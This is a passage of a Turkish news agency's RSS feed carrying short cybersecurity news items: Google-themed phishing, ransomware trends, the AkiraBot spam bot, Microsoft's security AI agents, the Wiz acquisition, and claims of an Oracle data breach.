<p data-start="887" data-end="1353" class=""><strong data-start="887" data-end="953">Dolandırıcılar Google altyapısındaki güvenlik açığını kullandı</strong><br data-start="953" data-end="956">Johnson’a ulaşan sahte e-posta, Google’ın resmi adreslerinden biri gibi görünüyordu. İçeriğinde, hesabının yasal bir sürece konu olduğu ve mahkemeye verildiği iddia ediliyordu. E-postada yer alan bağlantı ise gerçekte Google’a ait olmayan, fakat benzer alan adlarını kullanan bir sahte siteye yönlendiriyordu. Bu sahte “destek portalı”, kullanıcının giriş bilgilerini ele geçirmeyi hedefliyordu.</p>
<p data-start="1355" data-end="1792" class=""><strong data-start="1355" data-end="1419">Resmi açıklama: Açık kapatıldı, kullanıcılar dikkatli olmalı</strong><br data-start="1419" data-end="1422">Google sözcüsü, bu tür hedefli saldırıların farkında olduklarını ve sistemlerindeki açığı kapattıklarını duyurdu. Açıklamada, kullanıcıların dolandırıcılık girişimlerine karşı dikkatli olması gerektiği vurgulandı. Sözcü, ‘Google sizden şifrenizi, tek kullanımlık kodlarınızı ya da bildirimleri onaylamanızı e-posta veya telefonla istemez’ diyerek kullanıcıları uyardı.</p>
<p data-start="1794" data-end="2068" class=""><strong data-start="1794" data-end="1824">Google’dan yeni yönergeler</strong><br data-start="1824" data-end="1827">Şirket, kullanıcıların benzer dolandırıcılık girişimlerine karşı korunması için yeni güvenlik yönergeleri yayınladı. Özellikle bilinmeyen bağlantılara tıklanmaması ve e-postalardaki alan adlarının dikkatle incelenmesi gerektiği belirtildi.</p>
<p data-start="2070" data-end="2282" class=""><strong data-start="2070" data-end="2082"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Siber Güvenlikte Alarm Zilleri: Fidye Saldırıları Arttı, OpenSSL Açığı Kritik Seviyede</title>
            <link>https://cumha.com.tr/siber-guvenlikte-alarm-zilleri-fidye-saldirilari-artti-openssl-acigi-kritik-seviyede</link>
            <guid>https://cumha.com.tr/siber-guvenlikte-alarm-zilleri-fidye-saldirilari-artti-openssl-acigi-kritik-seviyede</guid>
            <description><![CDATA[ 2025’in 14. haftasında siber güvenlik dünyasında önemli gelişmeler yaşandı. Türkiye’de fidye yazılım saldırıları %37 arttı, OpenSSL’de milyonlarca sistemi etkileyebilecek kritik bir açık tespit edildi. Microsoft’un yapay zekâ destekli analiz platformu dikkat çekerken, Avrupa Birliği’nin veri güvenliği tasarısı ve sıfır güven mimarisi öne çıkan diğer başlıklar arasında yer aldı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202504/image_870x_6801f024d8630.webp" length="33972" type="image/webp"/>
            
            <pubDate>Fri, 18 Apr 2025 09:28:08 +0300</pubDate>
            <dc:creator>Ali Öztürk</dc:creator>
            <media:keywords>Türkiye’de fidye yazılım saldırıları neden arttı, OpenSSL açığı hangi sistemleri etkiliyor, Sentinel AI+ neler sunuyor, Zero Trust mimarisi neden önem kazandı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="509" data-end="980" class=""><strong data-start="509" data-end="565">Microsoft'tan Yapay Zekâ Destekli Güvenlik Platformu</strong><br data-start="565" data-end="568">Microsoft, kurumsal ağlar için geliştirdiği yeni yapay zekâ destekli tehdit analiz platformu 'Sentinel AI+'ı duyurdu. Bu sistem, ağ üzerindeki anomalileri gerçek zamanlı tespit ediyor ve tehdit istihbaratlarını analiz ederek güvenlik ekiplerine öneriler sunuyor. SOC (Security Operations Center) ekiplerinin yükünü azaltması hedeflenen bu çözüm, yapay zekânın karar destek aracı olarak kullanımını güçlendiriyor.</p>
<p data-start="982" data-end="1395" class=""><strong data-start="982" data-end="1037">AB’den Yapay Zekâ ve Veri Güvenliği İçin Yeni Hamle</strong><br data-start="1037" data-end="1040">Avrupa Birliği, kişisel verilerin daha güvenli işlenmesini sağlamak amacıyla yeni bir yasa tasarısı üzerinde çalışıyor. GDPR’nin ötesine geçen bu taslak, AI sistemlerinin nasıl çalıştığına dair daha fazla şeffaflık ve hesap verebilirlik getirmeyi amaçlıyor. Şirketlerin açıklanabilir yapay zekâ sistemleri geliştirmesi ve denetime açık olması öngörülüyor.</p>
<p data-start="1397" data-end="1835" class=""><strong data-start="1397" data-end="1460">Türkiye'de Fidye Yazılım Saldırılarında Endişe Verici Artış</strong><br data-start="1460" data-end="1463">Yerli siber güvenlik raporlarına göre 2025’in ilk çeyreğinde Türkiye’de fidye yazılım saldırıları %37 oranında arttı. Özellikle KOBİ'leri hedef alan bu saldırılar, zayıf şifreleme sistemleri ve güncellenmeyen altyapılar nedeniyle kolayca başarıya ulaşıyor. Uzmanlar, yedekleme sistemleri, EDR çözümleri ve düzenli sızma testlerine ağırlık verilmesi gerektiğini belirtiyor.</p>
<p data-start="1837" data-end="2183" class=""><strong data-start="1837" data-end="1873">OpenSSL’de Kritik Güvenlik Açığı</strong><br data-start="1873" data-end="1876">OpenSSL kütüphanesinde tespit edilen CVE-2025-13456 kodlu bellek taşması açığı, dünya genelinde milyonlarca sunucuyu riske atıyor. Saldırganların bu açık üzerinden rastgele kod çalıştırabildiği belirtiliyor. Uzmanlar, sistem yöneticilerinin acilen OpenSSL’in 3.2.4 sürümüne geçmeleri gerektiğini vurguluyor.</p>
<p data-start="2185" data-end="2489" class=""><strong data-start="2185" data-end="2230">Zero Trust Mimarisi Kurumların Gündeminde</strong><br data-start="2230" data-end="2233">Gartner’ın yeni raporuna göre, 2025 yılında kurumların %78’i sıfır güven (Zero Trust) mimarisine yatırım yapmayı planlıyor. Bu mimari, kullanıcı ve cihaz doğrulamasını sürekli kılarak hem dış hem de iç tehditlere karşı etkili bir güvenlik katmanı sağlıyor.</p>
<p data-start="2491" data-end="2778" class=""><strong data-start="2491" data-end="2534">WhatsApp Güvenlik Açığı Hızla Giderildi</strong><br data-start="2534" data-end="2537">Android kullanıcılarını etkileyen bir açık sayesinde saldırganlar WhatsApp üzerinden özel medyaya erişim sağlayabiliyordu. Meta, CVE-2025-09876 kodlu bu zafiyetin giderildiğini ve kullanıcıların uygulamayı güncellemeleri gerektiğini duyurdu.</p>
<p data-start="2780" data-end="3065" class=""><strong data-start="2780" data-end="2825">Siber Güvenlik Eğitimlerine Talep Patladı</strong><br data-start="2825" data-end="2828">Artan tehditler, bireysel ve kurumsal düzeyde siber güvenlik eğitimlerine olan ilgiyi de artırdı. Özellikle SOC analistliği, güvenlik açığı analizleri ve etik hackerlık gibi alanlarda düzenlenen sertifika programları yoğun talep görüyor.</p>
<p data-start="3067" data-end="3238" class=""></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>OpenAI tabanlı spam botu AkiraBot, 80 bin web sitesini hedef alarak büyük bir tehdit oluşturdu</title>
            <link>https://cumha.com.tr/openai-tabanli-spam-botu-akirabot-80-bin-web-sitesini-hedef-alarak-buyuk-bir-tehdit-olusturdu</link>
            <guid>https://cumha.com.tr/openai-tabanli-spam-botu-akirabot-80-bin-web-sitesini-hedef-alarak-buyuk-bir-tehdit-olusturdu</guid>
            <description><![CDATA[ SentinelLabs tarafından yayımlanan rapora göre, AkiraBot adındaki yeni nesil spam botu, yalnızca dört ay içinde 80 bin web sitesini hedef alarak, küçük ve orta ölçekli işletmelerin web formlarını kullanarak spam mesajlar gönderdi. AkiraBot, her siteye özel mesajlar üretiyor ve Google gibi arama motorlarında görünür kılmak amacıyla geliştirildi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202504/image_870x_67ff9a84c8d76.webp" length="53742" type="image/webp"/>
            
            <pubDate>Wed, 16 Apr 2025 14:54:52 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>AkiraBot nasıl çalışıyor, AkiraBot hangi yöntemlerle spam gönderiyor, OpenAI AkiraBot için nasıl bir önlem aldı, AkiraBot&#039;un hedeflediği web sitelerinin özellikleri nedir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="493" data-end="496"><strong data-start="496" data-end="530">Yeni Nesil Spam Aracı AkiraBot</strong><br data-start="530" data-end="533">Son yıllarda yapay zeka teknolojilerinin gelişmesiyle birlikte, kötü niyetli yazılımlar da aynı hızla evrim geçirmeye devam ediyor. SentinelLabs tarafından yayımlanan raporda, OpenAI tabanlı bir spam botunun nasıl etkili bir şekilde 80 binden fazla web sitesini hedef aldığına dair önemli veriler paylaşıldı. Bu spam botunun adı "AkiraBot" olarak biliniyor ve sadece dört ay gibi kısa bir sürede, küçük ve orta ölçekli işletmelere ait web sitelerinin iletişim formlarını ve canlı destek widget'larını kullanarak spam mesajlar göndermeyi başardı.</p>
<p></p>
<p data-start="1080" data-end="1587" class=""><strong data-start="1080" data-end="1109">Spam Mesajları Hedefliyor</strong><br data-start="1109" data-end="1112">AkiraBot'un amacı, 'Akira' ve 'ServiceWrap' adları altında şüpheli arama motoru optimizasyonu (SEO) hizmetlerini tanıtmak. Ancak bu botun en dikkat çekici özelliği, standart metin şablonları yerine her siteye özgü mesajlar oluşturması. AkiraBot, OpenAI’ın Chat API'sini kullanarak her bir hedef siteye yönelik özgün içerikler hazırlıyor. Bununla birlikte, botun gönderdiği mesajlar, arama motorları tarafından dizine alınıyor ve böylece daha geniş bir etki alanı yaratılıyor.</p>
<p data-start="1589" data-end="2079" class=""><strong data-start="1589" data-end="1625">İleri Düzey Engellemeleri Aşıyor</strong><br data-start="1625" data-end="1628">AkiraBot’un geliştirilmiş modüler yapısı, CAPTCHA gibi engelleri aşmak için çeşitli teknikler içeriyor. Selenium WebDriver kullanarak tarayıcıda gerçek kullanıcı davranışlarını taklit eden bot, IP adreslerini sürekli değiştiren ve kimliğini gizleyen yöntemler ile spam filtrelerinden kaçabiliyor. Ayrıca SmartProxy gibi hizmetler sayesinde, izlenebilirliği azaltıyor ve engellemelerle karşılaştığında hızla başka yollarla spam göndermeye devam ediyor.</p>
<p data-start="2081" data-end="2552" class=""><strong data-start="2081" data-end="2112">OpenAI ve Güvenlik Adımları</strong><br data-start="2112" data-end="2115">OpenAI, AkiraBot’un kullandığı API anahtarını devre dışı bırakarak bu kötüye kullanımın önüne geçtiğini açıkladı. Araştırmacılar, AkiraBot'un Eylül 2024'e kadar uzanan bir geçmişe sahip olduğunu ve yaklaşık 420 bin alan adını hedef aldığını belirtti. Ancak botun yalnızca 80 binine başarılı spam girişiminde bulunduğu tespit edildi. SentinelLabs tarafından yapılan uyarı üzerine, OpenAI konuya dair mücadeleye devam edeceklerini duyurdu.</p>
<p data-start="2554" data-end="2741" class=""><strong data-start="2554" data-end="2566"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Microsoft’tan siber güvenlikte çığır açan hamle: Otonom yapay zeka ajanları sahaya indi</title>
            <link>https://cumha.com.tr/microsofttan-siber-guvenlikte-cigir-acan-hamle-otonom-yapay-zeka-ajanlari-sahaya-indi</link>
            <guid>https://cumha.com.tr/microsofttan-siber-guvenlikte-cigir-acan-hamle-otonom-yapay-zeka-ajanlari-sahaya-indi</guid>
            <description><![CDATA[ Microsoft, Security Copilot platformunu genişleterek kimlik avı, veri kaybı ve diğer tehditlere karşı otonom müdahale edebilen altı yeni yapay zeka ajanını tanıttı. Bu ajanlar, yüksek hacimli güvenlik görevlerini insan müdahalesine gerek duymadan yerine getirecek ve üçüncü taraf sistemlerle de entegre çalışabilecek. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202504/image_870x_67f7beaf2a47a.webp" length="125622" type="image/webp"/>
            
            <pubDate>Thu, 10 Apr 2025 15:51:13 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Microsoft’un yeni yapay zeka ajanları neler yapacak, Security Copilot platformuna hangi özellikler eklendi, yeni ajanlar ne zaman kullanıma sunulacak, Microsoft Teams’e gelen güvenlik önlemleri neleri kapsıyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="461" data-end="464"><strong data-start="464" data-end="506">Microsoft’tan yeni yapay zeka ajanları</strong><br data-start="506" data-end="509">Microsoft, siber güvenlik alanında iş yükünü azaltmak amacıyla geliştirdiği yapay zeka destekli çözümlere yenilerini ekledi. Şirket, geçtiğimiz yıl tanıttığı Security Copilot platformunu genişleterek, altı yeni yapay zeka ajanını kullanıma sunacağını açıkladı.</p>
<p></p>
<p data-start="773" data-end="1150" class=""><strong data-start="773" data-end="799">Otonom çalışan ajanlar</strong><br data-start="799" data-end="802">Yeni yapay zeka ajanları, kimlik avı saldırıları ve veri sızıntısı gibi kritik tehditleri analiz edebilecek, olayları önceliklendirecek ve güvenlik açıklarını izleyerek otonom şekilde müdahalede bulunabilecek. Bu ajanların, Microsoft Security ürün ailesiyle entegre çalışarak güvenlik süreçlerini daha hızlı ve verimli hale getireceği belirtildi.</p>
<p data-start="1152" data-end="1554" class=""><strong data-start="1152" data-end="1181">Ön izleme süreci başlıyor</strong><br data-start="1181" data-end="1184">Microsoft’un açıklamasına göre yeni ajanlar, önümüzdeki ay ön izleme (preview) sürümünde kullanıcılara sunulacak. Şirket, aynı zamanda üçüncü taraf güvenlik çözümleriyle entegrasyonu da artırmayı hedefliyor. Bu kapsamda OneTrust, Aviatrix, BlueVoyant, Tanium ve Fletch gibi iş ortaklarıyla birlikte, farklı güvenlik senaryolarına uygun beş özel ajan daha geliştirildi.</p>
<p data-start="1556" data-end="2026" class=""><strong data-start="1556" data-end="1605">Microsoft Teams için de yeni önlemler geliyor</strong><br data-start="1605" data-end="1608">Microsoft, Security Copilot yeniliklerinin yanı sıra Teams platformuna da yeni güvenlik özellikleri ekliyor. Nisan ayında devreye alınacak güncellemeyle birlikte Microsoft Defender for Office 365, Teams kullanıcılarını kimlik avı saldırılarına ve zararlı içeriklere karşı daha etkin bir şekilde koruyacak. Yeni güvenlik özellikleri, şüpheli bağlantı ve ekleri tespit ederek kullanıcı güvenliğini artırmayı amaçlıyor.</p>
<p data-start="2028" data-end="2154" class="">Microsoft, bu yeni girişimlerini 9 Nisan’da düzenlenecek Microsoft Secure etkinliğinde detaylı olarak paylaşacağını duyurdu.</p>
<p data-start="2156" data-end="2384" class=""><strong data-start="2156" data-end="2168"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Google'dan 32 milyar dolarlık siber güvenlik hamlesi: Wiz anlaşması tamamlandı</title>
            <link>https://cumha.com.tr/googledan-32-milyar-dolarlik-siber-guvenlik-hamlesi-wiz-anlasmasi-tamamlandi</link>
            <guid>https://cumha.com.tr/googledan-32-milyar-dolarlik-siber-guvenlik-hamlesi-wiz-anlasmasi-tamamlandi</guid>
            <description><![CDATA[ Google&#039;ın çatı şirketi Alphabet, New York merkezli siber güvenlik firması Wiz&#039;i 32 milyar dolara satın almak için anlaşmaya vardı. Bu gelişmeyle birlikte Motorola&#039;yı geride bırakan satın alma, Google tarihinin en büyük satın alımı oldu. Anlaşma, ABD&#039;li düzenleyici kurumların onay sürecine tabi tutulacak. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202504/image_870x_67f7be753b97d.webp" length="37530" type="image/webp"/>
            
            <pubDate>Thu, 10 Apr 2025 15:50:10 +0300</pubDate>
            <dc:creator>Burak Ege Yilmaz</dc:creator>
            <media:keywords>Google Wiz&#039;i neden satın aldı, Wiz hangi hizmetleri sunuyor, satın alma anlaşması onaylandı mı, Google daha önce hangi siber güvenlik firmalarını satın aldı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p data-start="418" data-end="815" class=""><strong data-start="439" data-end="497">Google tarihinin en büyük satın alımını gerçekleştirdi</strong><br data-start="497" data-end="500">Google’ın çatı şirketi Alphabet, New York merkezli siber güvenlik firması Wiz’i 32 milyar dolar karşılığında satın almak için anlaşmaya vardığını duyurdu. 2012 yılında Motorola Mobility için ödenen 12,5 milyar dolarlık rakamı geride bırakan bu satın alma, şirket tarihinin en büyük anlaşması olarak kayıtlara geçti.</p>
<p data-start="817" data-end="1186" class=""><strong data-start="817" data-end="869">Daha önce iptal edilen anlaşma bu kez sonuçlandı</strong><br data-start="869" data-end="872">Google, 2023 yılında Wiz’i 23 milyar dolar değerleme üzerinden satın almayı planlamıştı. Ancak antitröst yasalarına yönelik endişeler nedeniyle şirket yöneticileri ve yatırımcıların karşı çıkması sonucunda ilk girişim başarısız olmuştu. Yeni anlaşma kapsamında bu kez taraflar uzlaştı ve işlem kamuoyuna duyuruldu.</p>
<p data-start="1188" data-end="1611" class=""><strong data-start="1188" data-end="1244">Wiz, Amazon ve Microsoft gibi devlere hizmet veriyor</strong><br data-start="1244" data-end="1247">İsrail merkezli bir girişim olan Wiz, Microsoft Azure, Amazon Web Services (AWS) ve Oracle Cloud gibi büyük platformlara bulut tabanlı siber güvenlik çözümleri sunuyor. Anlaşma onaylandığı takdirde şirket, Google Cloud bünyesine katılacak. Google, rekabet endişelerini gidermek adına, Wiz'in hizmetlerinin diğer platformlarda da sunulmaya devam edeceğini açıkladı.</p>
<p data-start="1613" data-end="1961" class=""><strong data-start="1613" data-end="1656">ABD makamlarının onay süreci başlayacak</strong><br data-start="1656" data-end="1659">32 milyar dolarlık bu dev satın alma, ABD'li düzenleyici kurumların incelemesine tabi tutulacak. Federal Ticaret Komisyonu Başkanı Andrew Ferguson, daha önce büyük teknoloji firmalarına karşı sıkı bir duruş sergileyeceğini açıklamıştı. Ferguson, Microsoft’a yönelik antitröst soruşturması da yürütüyor.</p>
<p data-start="1963" data-end="2438" class=""><strong data-start="1963" data-end="2016">Siber güvenlik alanındaki yatırımlar devam ediyor</strong><br data-start="2016" data-end="2019">Google, son yıllarda siber güvenlik alanında birçok önemli satın alma gerçekleştirdi. 2022 yılında siber güvenlik şirketleri Siemplify ve Mandiant'ı sırasıyla 500 milyon dolar ve 5,4 milyar dolara satın alan şirket, Wiz anlaşmasıyla bu alandaki en büyük yatırımını yapmış oldu. Satın alma, Google'ın bulut bilişim müşterilerine yönelik güvenlik hizmetlerini daha da güçlendirme planlarının bir parçası olarak görülüyor.</p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Uzayda korsan tehdidi büyüyor: 'Silahlı araçlarla müdahale şart'</title>
            <link>https://cumha.com.tr/uzayda-korsan-tehdidi-buyuyor-silahli-araclarla-mudahale-sart</link>
            <guid>https://cumha.com.tr/uzayda-korsan-tehdidi-buyuyor-silahli-araclarla-mudahale-sart</guid>
            <description><![CDATA[ Ticari faaliyetlerin artmasıyla birlikte uzay, yeni tehditlerle karşı karşıya kalıyor. Uzay korsanlığına karşı önlem alınması gerektiğini savunan uzmanlar, silahlı araçlar ve özel bir güvenlik ajansının kurulması çağrısında bulunuyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202503/image_870x_67e66c262c19a.webp" length="54544" type="image/webp"/>
            
            <pubDate>Fri, 28 Mar 2025 12:30:35 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>Uzay korsanlığı nedir, hangi kurumlar bu tehditle mücadele etmeli, uzay korsanlığına karşı hangi önlemler öneriliyor, silahlı uzay araçları nasıl bir rol oynayacak</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="351" data-end="354"><strong data-start="354" data-end="421">Uzayda artan ticaret yeni güvenlik tehditlerini gündeme taşıyor</strong><br data-start="421" data-end="424">Son yıllarda özel sektörün uzay faaliyetlerine yoğun şekilde yönelmesiyle birlikte, siber ve fiziksel tehditler de artmaya başladı. Uzay Suçları, Politikaları ve Yönetimi Çalışmaları Merkezi (CSCPG), bu tehditleri incelemek ve çözüm üretmek amacıyla kapsamlı araştırmalar yürütüyor.</p>
<p></p>
<p data-start="708" data-end="1096" class=""><strong data-start="708" data-end="791">‘Uzay Korsanlığı: Yörüngede Bir Suç Krizine Hazırlık’ kitabıyla dikkat çektiler</strong><br data-start="791" data-end="794">CSCPG Yöneticisi Marc Feldman ve siber güvenlik uzmanı Hugh Taylor, birlikte kaleme aldıkları kitapta, uzay korsanlığının artık teorik değil, fiili bir tehdit olduğunu belirtiyor. Feldman, bu alanda şimdiden harekete geçilmesi gerektiğini vurgularken, Taylor ise koordineli bir savunma yapısı öneriyor.</p>
<p data-start="1098" data-end="1481" class=""><strong data-start="1098" data-end="1148">Silahlı uzay araçları ve özel teşkilat önerisi</strong><br data-start="1148" data-end="1151">Uzay korsanlığına karşı mücadele için özel bir teşkilatın kurulması gerektiğini savunan Taylor, ABD Uzay Kuvvetleri'nin şu an için bu rolü üstlenmeye uygun olmadığını ifade ediyor. ABD istihbarat topluluğu içinde özel bir uzay güvenliği ajansı kurulması ya da BM Uzay İşleri Ofisi’nin (UNOOSA) bu sürece dahil edilmesi öneriliyor.</p>
<p data-start="1483" data-end="1958" class=""><strong data-start="1483" data-end="1539">Yayın uydusunun kaçırılması gibi senaryolar gündemde</strong><br data-start="1539" data-end="1542">Marc Feldman, uzay korsanlığının potansiyel senaryolarına dikkat çekerek, küresel bir medya etkinliğini sabote etmek amacıyla bir yayın uydusunun kaçırılmasının mümkün olduğunu dile getiriyor. Feldman, bu tür tehditlere karşı hızlı teknolojik çözümlerin geliştirilmesinin kritik olduğunu belirtiyor. Ayrıca, uzaya gönderilecek küçük, çevik ve silahlı araçların savunmada önemli bir rol oynayabileceğini ifade ediyor.</p>
<p data-start="1960" data-end="2140" class=""><strong data-start="1960" data-end="1972"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>ABD istihbaratı milyonlarca cep telefonunu hedef alıyor: Çin'den sarsıcı casusluk raporu</title>
            <link>https://cumha.com.tr/abd-istihbarati-milyonlarca-cep-telefonunu-hedef-aliyor-cinden-sarsici-casusluk-raporu</link>
            <guid>https://cumha.com.tr/abd-istihbarati-milyonlarca-cep-telefonunu-hedef-aliyor-cinden-sarsici-casusluk-raporu</guid>
            <description><![CDATA[ Çin Siber Güvenlik Endüstrisi Birliği&#039;nin yayımladığı son rapor, ABD istihbarat teşkilatlarının dünya genelinde cep telefonu kullanıcılarını gelişmiş dijital araçlarla gözetlediğini iddia ediyor. iPhone’lara yönelik &#039;sıfır tıklama&#039; saldırıları ve internet altyapısına sızmalar dikkat çekiyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202503/image_870x_67e52580354f2.webp" length="34584" type="image/webp"/>
            
            <pubDate>Thu, 27 Mar 2025 13:16:44 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>ABD cep telefonlarını nasıl izliyor, iPhone kullanıcıları ne tür risklerle karşı karşıya, sıfır tıklama saldırısı nedir, ABD casusluk faaliyetleri hangi sistemleri hedef alıyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="433" data-end="436"><strong data-start="436" data-end="497">ABD istihbaratı cep telefonlarını küresel ölçekte izliyor</strong><br data-start="497" data-end="500">Çin Siber Güvenlik Endüstrisi Birliği (CCIA) tarafından yayımlanan son siber güvenlik raporu, dünya çapında geniş yankı uyandırdı. Rapora göre, ABD'li istihbarat birimleri cep telefonu kullanıcılarının verilerine gizlice ulaşıyor. Bu faaliyetlerde SIM kartlardan işletim sistemlerine, mobil uygulamalardan donanımsal bileşenlere kadar birçok dijital altyapının hedef alındığı ifade ediliyor.</p>
<p></p>
<p data-start="893" data-end="1453" class=""><strong data-start="893" data-end="959">Sıfır tıklama saldırıları iPhone kullanıcılarını tehdit ediyor</strong><br data-start="959" data-end="962">Raporda, Apple marka telefonlar özellikle hedef alınan cihazlar arasında yer alıyor. iPhone'lara kullanıcı etkileşimi olmadan sızılabilen 'sıfır tıklama' saldırıları aracılığıyla, iMessage uygulamasına casus yazılımlar yerleştirildiği belirtiliyor. Bu yazılımlar sayesinde kullanıcıların mesajları, arama geçmişleri, fotoğrafları ve gerçek zamanlı konum bilgileri ele geçirilebiliyor. Uzmanlar, bu durumun iPhone sahiplerinin uzun süreli ve fark edilmeden izlenmesine yol açtığını aktarıyor.</p>
<p data-start="1455" data-end="1926" class=""><strong data-start="1455" data-end="1506">ABD casusluğu sadece telefonlarla sınırlı değil</strong><br data-start="1506" data-end="1509">CCIA’nın yayımladığı rapor, izleme faaliyetlerinin yalnızca mobil cihazlarla sınırlı kalmadığını ortaya koyuyor. Büyük teknoloji şirketlerine ait veri merkezleri, internet servis sağlayıcıları, mobil ağ altyapıları ve hatta USB kabloları gibi fiziksel veri aktarım araçları da hedef alınıyor. Bu sayede çok sayıda kullanıcının aynı anda takip edilebildiği, güvenlik duvarlarının etkisiz hale getirildiği vurgulanıyor.</p>
<p data-start="1928" data-end="2486" class=""><strong data-start="1928" data-end="1977">Küresel güvenlik ve mahremiyet tehdit altında</strong><br data-start="1977" data-end="1980">Rapor, tüm bu faaliyetlerin kullanıcıların veri güvenliğini ciddi şekilde tehlikeye attığını savunuyor. ABD tarafından kullanıldığı iddia edilen casusluk araçlarının Truva atı virüsleri, gizli izleme yazılımları ve diğer dijital tehdit unsurlarından oluştuğu belirtiliyor. CCIA, bu durumun internet kullanımını güvensiz hale getirdiğini ve ulusal güvenlikleri tehdit ettiğini ifade ediyor. Siber güvenlik uzmanları, yaşananların kimlik hırsızlığı ve veri sızıntıları riskini artırdığı uyarısında bulunuyor.</p>
<p data-start="2488" data-end="2681" class=""><strong data-start="2488" data-end="2500"></strong></p><br><p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>6 Milyon Şirket Verisi Satışa Sunuldu, Oracle İhlal İddialarını Şiddetle Reddetti</title>
            <link>https://cumha.com.tr/6-milyon-sirket-verisi-satisa-sunuldu-oracle-ihlal-iddialarini-siddetle-reddetti</link>
            <guid>https://cumha.com.tr/6-milyon-sirket-verisi-satisa-sunuldu-oracle-ihlal-iddialarini-siddetle-reddetti</guid>
            <description><![CDATA[ Bir hackerın Oracle sistemlerinden 6 milyon şirket kaydını çaldığı iddiası teknoloji dünyasında büyük yankı uyandırdı. Oracle, CloudSEK’in ortaya attığı bu iddiaları kesin bir dille yalanladı. Siber güvenlik uzmanları ise riskin ciddi olabileceği uyarısında bulunuyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202503/image_870x_67e3ec0af299a.webp" length="19252" type="image/webp"/>
            
            <pubDate>Wed, 26 Mar 2025 14:59:12 +0300</pubDate>
            <dc:creator>Nurullah Şeker</dc:creator>
            <media:keywords>Oracle veri ihlali iddiaları doğru mu, hacker hangi verilere ulaştı, CloudSEK’in raporu neyi ortaya koyuyor, şirketler hangi güvenlik önlemlerini almalı</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p><br data-start="406" data-end="409"><strong data-start="409" data-end="459">CloudSEK: Milyonlarca şirket verisi sızdırıldı</strong><br data-start="459" data-end="462">Bengaluru merkezli siber güvenlik firması CloudSEK tarafından yayımlanan rapora göre, 'rose87168' takma adlı bir bilgisayar korsanı, Oracle sistemlerinden çaldığını iddia ettiği 6 milyon şirket kaydını çevrim içi ortamda satışa çıkardı. Raporda, söz konusu veriler arasında kritik öneme sahip dosyalar, şifrelenmiş giriş bilgileri ve güvenli bağlantılar için kullanılan anahtarların yer aldığı belirtildi.</p>
<p></p>
<p data-start="869" data-end="1201" class=""><strong data-start="869" data-end="909">Oracle’dan iddialara kesin yalanlama</strong><br data-start="909" data-end="912">Oracle, kamuoyuna yaptığı açıklamada, söz konusu iddiaların gerçeği yansıtmadığını savundu. Açıklamada, <em data-start="1016" data-end="1181">'Oracle Cloud’da herhangi bir veri ihlali yaşanmadı. Ortaya çıkan kimlik bilgileri Oracle Cloud’a ait değil. Müşterilerimiz arasında veri kaybı yaşayan kimse yok.'</em> ifadeleri yer aldı.</p>
<p data-start="1203" data-end="1572" class=""><strong data-start="1203" data-end="1246">Fidye talebi ve şifre çözme girişimleri</strong><br data-start="1246" data-end="1249">CloudSEK’in değerlendirmelerine göre hacker, veri güvenliği tehlikeye giren 140 binden fazla şirkete ulaşıp çalınan verilerin silinmesi karşılığında fidye talebinde bulundu. Hackerın ayrıca şifrelenmiş bilgilerin çözülmesi konusunda çevrim içi platformlardan yardım istediği ve çözüm sunanlara ödül teklif ettiği aktarıldı.</p>
<p data-start="1574" data-end="1863" class=""><strong data-start="1574" data-end="1625">Güvenlik açığı Oracle WebLogic Server’a mı ait?</strong><br data-start="1625" data-end="1628">Raporda, hackerın Oracle Cloud sistemlerinde yer alan oturum açma modülündeki bir güvenlik açığını istismar etmiş olabileceği ileri sürüldü. Uzmanlar, bu açığın Oracle WebLogic Server yazılımıyla ilişkili olabileceğini değerlendiriyor.</p>
<p data-start="1865" data-end="2199" class=""><strong data-start="1865" data-end="1901">Şirketler için potansiyel tehdit</strong><br data-start="1901" data-end="1904">Sızdırıldığı iddia edilen veriler arasında JKS dosyaları, şifrelenmiş tek oturum açma (SSO) şifreleri, çeşitli anahtar dosyaları ve Oracle Enterprise Manager JPS anahtarlarının bulunduğu öne sürüldü. Bu tür bilgiler, yetkisiz erişimler aracılığıyla daha geniş sistemlere sızma riski yaratabilir.</p>
